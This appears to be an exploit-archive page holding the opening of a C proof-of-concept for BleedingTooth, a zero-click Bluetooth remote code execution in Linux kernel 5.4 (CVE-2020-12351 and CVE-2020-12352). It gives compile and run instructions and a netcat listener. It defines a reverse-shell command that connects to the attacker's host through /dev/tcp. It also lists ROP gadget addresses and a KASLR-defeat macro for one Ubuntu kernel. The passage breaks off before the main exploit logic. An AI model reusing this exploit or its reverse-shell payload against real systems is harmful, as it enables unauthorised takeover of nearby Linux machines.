Linux Kernel 5.4 BleedingTooth Remote Code Execution

Linux kernel version 5.4 BleedingTooth bluetooth zero-click proof of concept remote code execution exploit.


MD5 | 11e39065cefe8b6ef7461c14faa79210

/*
* BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution
* by Andy Nguyen ([email protected])
*
* This Proof-Of-Concept demonstrates the exploitation of
* CVE-2020-12351 and CVE-2020-12352.
*
* Compile using:
* $ gcc -o exploit exploit.c -lbluetooth
*
* and execute as:
* $ sudo ./exploit target_mac source_ip source_port
*
* In another terminal, run:
* $ nc -lvp 1337
* exec bash -i 2>&0 1>&0
*
* If successful, a calc can be spawned with:
* export XAUTHORITY=/run/user/1000/gdm/Xauthority
* export DISPLAY=:0
* gnome-calculator
*
* This Proof-Of-Concept has been tested against a Dell XPS 15 running
* Ubuntu 20.04.1 LTS with:
* - 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020
* x86_64 x86_64 x86_64 GNU/Linux
*
* The success rate of the exploit is estimated at 80%.
*/

#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <bluetooth/l2cap.h>
#include <errno.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

#define REMOTE_COMMAND "/bin/bash -c /bin/bash</dev/tcp/%s/%s"

// Increase if the heap spray is not reliable.
#define NUM_SPRAY_KMALLOC_1024 6
#define NUM_SPRAY_KMALLOC_128 6

// Increase if stuck at sending packets.
#define HCI_SEND_ACL_DATA_WAIT_USEC 5000

#define KERNEL_TEXT_BASE 0xffffffff81000000

#define KERNEL_UBUNTU_5_4_0_48 1

#ifdef KERNEL_UBUNTU_5_4_0_48
#define PUSH_RSI_ADD_BYTE_PTR_RBX_41_BL_POP_RSP_POP_RBP_RET 0xffffffff81567f46
#define POP_RAX_RET 0xffffffff8103d0b1
#define POP_RDI_RET 0xffffffff8108efa0
#define JMP_RAX 0xffffffff8100005b
#define RUN_CMD 0xffffffff810ce470
#define DO_TASK_DEAD 0xffffffff810dc260

#define KASLR_DEFEAT(kaslr_offset, kernel_addr) \
do { \
if ((kernel_addr & 0xfffff) == 0xf4d8e) \
kaslr_offset = kernel_addr - KERNEL_TEXT_BASE - 0xf4d8e; \
else \
kaslr_offset = kernel_addr - KERNEL_TEXT_BASE - 0xc001a4; \
} while (0)
#else
#error "No kernel version defined"
Related Posts